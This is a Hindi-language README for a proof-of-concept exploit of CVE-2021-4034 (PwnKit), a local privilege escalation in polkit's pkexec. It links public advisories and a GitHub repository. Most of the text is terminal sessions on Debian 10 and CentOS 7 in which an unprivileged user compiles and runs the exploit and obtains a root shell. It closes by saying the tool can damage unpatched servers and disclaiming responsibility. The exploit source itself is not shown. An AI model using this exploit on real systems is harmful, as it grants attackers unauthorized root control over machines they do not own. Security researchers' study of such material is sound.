
CVE-2021-4034 (PwnKit) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो polkit के pkexec में एक स्थानीय विशेषाधिकार वृद्धि है, जिसे Debian 10 और CentOS 7 पर सत्यापित किया गया है।

हालाँकि यह भेद्यता दूरस्थ रूप से शोषण योग्य नहीं है और अपने आप में मनमाना कोड निष्पादन की अनुमति नहीं देती है, फिर भी इसका उपयोग उन हमलावरों द्वारा किया जा सकता है जिन्होंने पहले से ही किसी भेद्य होस्ट पर पैर जमा लिया है, ताकि वे अपने विशेषाधिकारों को बढ़ा सकें और उस क्षमता को प्राप्त कर सकें।
https://seclists.org/oss-sec/2022/q1/80https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
Debian 10 और CentOS 7 पर सत्यापित।
आप इस लिंक पर रिपॉजिटरी पा सकते हैं → https://github.com/Yakumwamba/POC-CVE-2021-4034.git
user@debian:~$ grep PRETTY /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
user@debian:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
user@debian:~$ ./cve-2021-4034-poc
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(user)
[user@centos ~]$ grep PRETTY /etc/os-release
PRETTY_NAME="CentOS Linux 7 (Core)"
[user@centos ~]$ id
uid=11000(user) gid=11000(user) groups=11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[user@centos ~]$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
[user@centos ~]$ ./cve-2021-4034-poc
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),11000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit
इसका उपयोग बिना पैच वाले Linux सर्वरों को नुकसान पहुँचाने या अक्षम करने के लिए भी किया जा सकता है। इस टूल के लेखक इसके उपयोग के परिणामस्वरूप होने वाली किसी भी क्षति या हानि के लिए जिम्मेदार नहीं हैं।